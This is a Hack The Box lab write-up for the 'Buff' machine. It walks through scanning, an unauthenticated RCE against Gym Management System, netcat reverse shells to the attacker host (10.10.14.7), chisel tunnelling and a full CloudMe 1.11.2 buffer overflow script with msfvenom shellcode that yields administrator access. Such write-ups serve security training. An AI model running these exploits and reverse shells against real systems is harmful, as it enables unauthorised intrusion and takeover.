Buff
Contents
Ports scan
u505@naos:~/HTB/Machines/Buff$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.198
Starting masscan 1.0.5 at 2021-01-08 19:24:28 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 8080/tcp on 10.10.10.198 Discovered open port 7680/tcp on 10.10.10.198
u505@naos:~/HTB/Machines/Buff$ nmap -sC -sV buff Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-08 14:25 EST Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.35 seconds
u505@naos:~/HTB/Machines/Buff$ nmap -Pn -sC -sV buff Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-08 14:25 EST Nmap scan report for buff (10.10.10.198) Host is up (0.037s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 |_http-title: mrb3n's Bro Hut
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.62 seconds
Check on port 7680 too, but it doesn't provide more information.
u505@naos:~/HTB/Machines/Buff$ nmap -Pn -p 8080,7680 -sC -sV buff Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-08 14:27 EST Nmap scan report for buff (10.10.10.198) Host is up (0.038s latency).
PORT STATE SERVICE VERSION 7680/tcp open pando-pub? 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 |_http-title: mrb3n's Bro Hut
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.96 seconds
Web enumeration
The contact page provide the software name.
u505@naos:~/HTB/Machines/Buff$ searchsploit gym
---------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Executi | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Dirsearch
Dir search provides some folder to search, but the exploit seems to be more useful.
u505@naos:~/HTB/Machines/Buff$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,php" -f -t 100 -u http://buff:8080
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: GET | Threads: 100 | Wordlist size: 18441
Error Log: /opt/utils/dirsearch/logs/errors-21-01-11_14-39-37.log
Target: http://buff:8080/
Output File: /opt/utils/dirsearch/reports/buff/_21-01-11_14-39-39.txt
[14:39:39] Starting: [14:39:40] 403 - 1KB - /.htpasswd.php [14:39:40] 403 - 1KB - /.hta.php [14:39:40] 403 - 1KB - /.hta.txt [14:39:40] 403 - 1KB - /.htaccess.php [14:39:40] 403 - 1KB - /.hta/ [14:39:40] 403 - 1KB - /.htpasswd.txt [14:39:53] 200 - 5KB - /about.php [14:39:53] 200 - 5KB - /About.php [14:39:54] 403 - 1KB - /admin.cgi [14:39:54] 403 - 1KB - /admin.pl [14:39:54] 403 - 1KB - /admin.pl/ [14:39:54] 403 - 1KB - /admin.cgi.txt [14:39:54] 403 - 1KB - /admin.cgi/ [14:39:54] 403 - 1KB - /admin.pl.txt [14:40:04] 403 - 1KB - /AT-admin.cgi.txt [14:40:04] 403 - 1KB - /AT-admin.cgi [14:40:04] 403 - 1KB - /AT-admin.cgi/ [14:40:05] 403 - 1KB - /aux.php [14:40:05] 403 - 1KB - /aux.txt [14:40:05] 403 - 1KB - /aux [14:40:05] 403 - 1KB - /aux/ [14:40:13] 403 - 1KB - /boot/ [14:40:13] 301 - 326B - /boot -> http://buff:8080/boot/ [14:40:16] 403 - 1KB - /cachemgr.cgi.txt [14:40:16] 403 - 1KB - /cachemgr.cgi [14:40:16] 403 - 1KB - /cachemgr.cgi/ [14:40:20] 403 - 1KB - /cgi-bin/ [14:40:27] 403 - 1KB - /com2/ [14:40:27] 403 - 1KB - /com2 [14:40:27] 403 - 1KB - /com3 [14:40:27] 403 - 1KB - /com3.php [14:40:27] 403 - 1KB - /com1.txt [14:40:27] 403 - 1KB - /com1 [14:40:27] 403 - 1KB - /com1/ [14:40:27] 403 - 1KB - /com1.php [14:40:27] 403 - 1KB - /com3.txt [14:40:30] 403 - 1KB - /con/ [14:40:30] 403 - 1KB - /com2.txt [14:40:30] 403 - 1KB - /con.php [14:40:30] 403 - 1KB - /com3/ [14:40:30] 403 - 1KB - /con [14:40:30] 403 - 1KB - /com2.php [14:40:30] 403 - 1KB - /con.txt [14:40:31] 200 - 4KB - /contact.php [14:40:33] 200 - 4KB - /Contact.php [14:40:55] 200 - 4KB - /edit.php [14:40:56] 403 - 1KB - /error/ [14:40:57] 301 - 324B - /ex -> http://buff:8080/ex/ [14:40:59] 503 - 1KB - /examples [14:40:59] 503 - 1KB - /examples/ [14:41:04] 200 - 5KB - /ex/ [14:41:07] 200 - 4KB - /feedback.php [14:41:21] 200 - 143B - /Home.php [14:41:22] 200 - 143B - /home.php [14:41:26] 301 - 325B - /img -> http://buff:8080/img/ [14:41:26] 403 - 1KB - /img/ [14:41:26] 200 - 73KB - /icons/ [14:41:29] 301 - 329B - /include -> http://buff:8080/include/ [14:41:32] 200 - 5KB - /index.php/ [14:41:32] 200 - 5KB - /Index.php [14:41:32] 403 - 1KB - /include/ [14:41:33] 200 - 5KB - /index.php [14:41:41] 200 - 18KB - /LICENSE [14:41:41] 200 - 18KB - /license [14:41:42] 403 - 1KB - /licenses [14:41:43] 403 - 1KB - /licenses/ [14:41:46] 403 - 1KB - /lpt1.php [14:41:46] 403 - 1KB - /lpt1.txt [14:41:46] 403 - 1KB - /lpt1 [14:41:47] 403 - 1KB - /lpt2.php [14:41:47] 403 - 1KB - /lpt2 [14:41:47] 403 - 1KB - /lpt2.txt [14:41:47] 403 - 1KB - /lpt1/ [14:41:47] 403 - 1KB - /lpt2/ [14:42:06] 403 - 1KB - /nul.php [14:42:06] 403 - 1KB - /nul [14:42:06] 403 - 1KB - /nul/ [14:42:07] 403 - 1KB - /nul.txt [14:42:13] 200 - 8KB - /packages.php [14:42:17] 403 - 1KB - /php-cgi/ [14:42:18] 403 - 1KB - /phpmyadmin/ [14:42:19] 403 - 1KB - /phpmyadmin [14:42:27] 403 - 1KB - /prn.txt [14:42:27] 403 - 1KB - /prn [14:42:27] 403 - 1KB - /prn/ [14:42:28] 403 - 1KB - /prn.php [14:42:29] 301 - 329B - /profile -> http://buff:8080/profile/ [14:42:31] 200 - 132B - /profile/ [14:42:42] 200 - 137B - /register.php [14:42:52] 403 - 1KB - /server-info/ [14:42:52] 403 - 1KB - /server-status/ [14:42:52] 403 - 1KB - /server-info [14:42:52] 403 - 1KB - /server-status [14:43:24] 403 - 1KB - /upload/ [14:43:24] 301 - 328B - /upload -> http://buff:8080/upload/ [14:43:24] 200 - 209B - /up.php [14:43:26] 200 - 107B - /upload.php [14:43:33] 403 - 1KB - /webalizer/ [14:43:33] 403 - 1KB - /webalizer
Task Completed
User flag
u505@naos:~/HTB/Machines/Buff$ searchsploit -m 48506
Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
URL: https://www.exploit-db.com/exploits/48506
Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Buff/48506.py
The page upload.php does not check for authentication. The extension is whitelisted adding a double extension and changing the content type.
u505@naos:~/HTB/Machines/Buff$ python 48506.py http://10.10.10.198:8080/ /\ /vvvvvvvvvvvv \--------------------------------------, `^^^^^^^^^^^^ /============BOKU=====================" \/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami �PNG
buff\shaun
Obtain friendly shell
Create a web server to download executables to the machine.
u505@naos:~/HTB/Machines/Buff$ mkdir web u505@naos:~/HTB/Machines/Buff$ cd web u505@naos:~/HTB/Machines/Buff/web$ cp /opt/utils/nc.exe/nc64.exe ./ u505@naos:~/HTB/Machines/Buff/web$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
Download nc.exe from the target.
C:\xampp\htdocs\gym\upload> powershell -c "Invoke-WebRequest -Uri http://10.10.14.7/nc64.exe -OutFile nc64.exe" �PNG
Raise a listener
u505@naos:~/HTB/Machines/Buff$ rlwrap nc -nlvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Call nc to open a reverse shell.
C:\xampp\htdocs\gym\upload> nc64.exe 10.10.14.7 4444 -e cmd.exe
The reverse shell starts
u505@naos:~/HTB/Machines/Buff$ rlwrap nc -nlvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.198. Ncat: Connection from 10.10.10.198:49907. Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload> whoami whoami buff\shaun
User flag
C:\xampp\htdocs\gym\upload>cd C:\Users\shaun\Desktop cd C:\Users\shaun\Desktop
C:\Users\shaun\Desktop>type user.txt type user.txt <USER_FLAG>
Privilege escalation
Upload of winPEAS.exe doesn't give a hint how to escalate, but in the Download folder of the user there is an executable.
C:\Users\shaun\Downloads>dir dir Volume in drive C has no label. Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Downloads
14/07/2020 12:27 <DIR> . 14/07/2020 12:27 <DIR> .. 16/06/2020 15:26 17,830,824 CloudMe_1112.exe 1 File(s) 17,830,824 bytes 2 Dir(s) 9,354,883,072 bytes free
The program is running.
C:\Users\shaun\Downloads>tasklist /v tasklist /v
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title ========================= ======== ================ =========== ============ =============== ================================================== ============ ======================================================================== System Idle Process 0 0 8 K Unknown NT AUTHORITY\SYSTEM 6:18:41 N/A ... conhost.exe 5428 0 11,072 K Unknown N/A 0:00:03 N/A CloudMe.exe 7524 0 27,268 K Unknown N/A 0:00:01 N/A timeout.exe 124 0 3,964 K Unknown N/A 0:00:00 N/A tasklist.exe 2580 0 7,740 K Unknown BUFF\shaun 0:00:00 N/A
CloudMe 1.11.2 Buffer overflow exloit
u505@naos:~/HTB/Machines/Buff$ searchsploit cloudme
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/Buff$ searchsploit -m 48389
Exploit: CloudMe 1.11.2 - Buffer Overflow (PoC)
URL: https://www.exploit-db.com/exploits/48389
Path: /usr/share/exploitdb/exploits/windows/remote/48389.py
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Buff/48389.py
The exploit send a payload to the port 8888, and raises a buffer overflow that allows to execute a command.
u505@naos:~/HTB/Machines/Buff$ cp 48389.py exploitcloudme.py
Batch file creation
We create a batch file that run a nc command that calls back our machine.
C:\Users\shaun\Desktop>echo C:\xampp\htdocs\gym\upload\nc64.exe 10.10.14.7 4445 -e cmd.exe > reverse.bat echo C:\xampp\htdocs\gym\upload\nc64.exe 10.10.14.7 4445 -e cmd.exe > reverse.bat
Create payload from exploit
Following the PoC example, we create the payload using msfvenom to call the batch file.
u505@naos:~/HTB/Machines/Buff$ msfvenom -a x86 -p windows/exec CMD=C:\\Users\\shaun\\Desktop\\reverse.bat -b '\x00\x0A\x0D' -f python
We insert the generated code in our python file.
u505@naos:~/HTB/Machines/Buff$ cat exploitcloudme.py # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC) # Date: 2020-04-27 # Exploit Author: Andy Bowden # Vendor Homepage: https://www.cloudme.com/en # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: CloudMe 1.11.2 # Tested on: Windows 10 x86
#Instructions: # Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052 EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33" payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc" payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f" payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8" payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f" payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43" payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee" payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4" payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a" payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff" payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33" payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59" payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05" payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4" payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6" payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c" payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
#u505@naos:~/HTB/Machines/Buff$ msfvenom -a x86 -p windows/exec CMD=C:\\Users\\shaun\\Desktop\\reverse.bat -b '\x00\x0A\x0D' -f python #[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload #Found 11 compatible encoders #Attempting to encode payload with 1 iterations of x86/shikata_ga_nai #x86/shikata_ga_nai succeeded with size 246 (iteration=0) #x86/shikata_ga_nai chosen with final size 246 #Payload size: 246 bytes #Final size of python file: 1204 bytes buf = b"" buf += b"\xd9\xe5\xbd\x32\xa7\x51\xd0\xd9\x74\x24\xf4\x5f\x29" buf += b"\xc9\xb1\x37\x31\x6f\x1a\x83\xc7\x04\x03\x6f\x16\xe2" buf += b"\xc7\x5b\xb9\x52\x27\xa4\x3a\x33\xae\x41\x0b\x73\xd4" buf += b"\x02\x3c\x43\x9f\x47\xb1\x28\xcd\x73\x42\x5c\xd9\x74" buf += b"\xe3\xeb\x3f\xba\xf4\x40\x03\xdd\x76\x9b\x57\x3d\x46" buf += b"\x54\xaa\x3c\x8f\x89\x46\x6c\x58\xc5\xf4\x81\xed\x93" buf += b"\xc4\x2a\xbd\x32\x4c\xce\x76\x34\x7d\x41\x0c\x6f\x5d" buf += b"\x63\xc1\x1b\xd4\x7b\x06\x21\xaf\xf0\xfc\xdd\x2e\xd1" buf += b"\xcc\x1e\x9c\x1c\xe1\xec\xdd\x59\xc6\x0e\xa8\x93\x34" buf += b"\xb2\xaa\x67\x46\x68\x3f\x7c\xe0\xfb\xe7\x58\x10\x2f" buf += b"\x71\x2a\x1e\x84\xf6\x74\x03\x1b\xdb\x0e\x3f\x90\xda" buf += b"\xc0\xc9\xe2\xf8\xc4\x92\xb1\x61\x5c\x7f\x17\x9e\xbe" buf += b"\x20\xc8\x3a\xb4\xcd\x1d\x37\x97\x9b\xe0\xca\xad\xee" buf += b"\xe3\xd4\xad\x5e\x8c\xe5\x26\x31\xcb\xfa\xec\x75\x23" buf += b"\xb1\xad\xdc\xac\x1f\x24\x5d\xb1\xa0\x92\xa2\xcc\x22" buf += b"\x17\x5b\x2b\x3a\x52\x5e\x77\xfd\x8e\x12\xe8\x6b\xb1" buf += b"\x81\x09\xbe\xf2\x1f\xaa\x15\x86\x3a\x20\xe6\x34\xb6" buf += b"\xac\x69\xb0\x56\x71\x2d\x5f\xd4\xe2\xd9\xf0\x6a\xa9" buf += b"\x53\x6a\xfd\x34\xe1\x07\x64\x99\x67\x89\x12\xe5" payload = buf
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,8888)) s.send(buf) except Exception as e: print(sys.exc_value)
Raise the listener
u505@naos:~/HTB/Machines/Buff$ rlwrap nc -lnvp 4445 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445
Port redirection
The port 8888 is only accessible from localhost (127.0.0.1). We need to redirect our remote port to the local port 8888. We will use chisel to redirect our attacker machine port 8888 to the localhost port 8888 of the target machine.
u505@naos:~/HTB/Machines/Buff/web$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.3/chisel_1.7.3_windows_amd64.gz u505@naos:~/HTB/Machines/Buff/web$ gunzip chisel_1.7.3_windows_amd64.gz
Download of the chisel program from the target machine.
C:\Users\shaun\Desktop> powershell -c "Invoke-WebRequest -Uri http://10.10.14.7/chisel_1.7.3_windows_amd64 -OutFile chisel.exe" powershell -c "Invoke-WebRequest -Uri http://10.10.14.7/chisel_1.7.3_windows_amd64 -OutFile chisel.exe"
Download chisel in the attacker machine
u505@naos:~/HTB/Machines/Buff$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.3/chisel_1.7.3_linux_amd64.gz u505@naos:~/HTB/Machines/Buff$ mv chisel_1.7.3_linux_amd64.gz chisel
Start the chisel server
u505@naos:~/HTB/Machines/Buff$ ./chisel server --reverse --port 4446 2021/01/11 17:28:10 server: Reverse tunnelling enabled 2021/01/11 17:28:10 server: Fingerprint k7guofdpNxngA0JtqWLZqoGd8vRScrEYqypJELF8fdE= 2021/01/11 17:28:10 server: Listening on http://0.0.0.0:4446
Start the chisel client
C:\Users\shaun\Desktop>chisel client 10.10.14.7:4446 R:8888:127.0.0.1:8888 chisel client 10.10.14.7:4446 R:8888:127.0.0.1:8888 2021/01/11 22:41:27 client: Connecting to ws://10.10.14.7:4446 2021/01/11 22:41:28 client: Connected (Latency 39.3174ms)
The server redirects the port 8888
u505@naos:~/HTB/Machines/Buff$ ./chisel server --reverse --port 4446 2021/01/11 17:28:10 server: Reverse tunnelling enabled 2021/01/11 17:28:10 server: Fingerprint k7guofdpNxngA0JtqWLZqoGd8vRScrEYqypJELF8fdE= 2021/01/11 17:28:10 server: Listening on http://0.0.0.0:4446 2021/01/11 17:33:08 server: session#1: tun: proxy#R:8888=>8888: Listening
Run exploit
u505@naos:~/HTB/Machines/Buff$ python3 exploitcloudme.py
After 2 seconds the reverse shell opens.
u505@naos:~/HTB/Machines/Buff$ rlwrap nc -lnvp 4445 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445 Ncat: Connection from 10.10.10.198. Ncat: Connection from 10.10.10.198:49946. Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami whoami buff\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt type root.txt <ROOT_FLAG>
References
Daniel Simao 14:27, 11 January 2021 (EST)
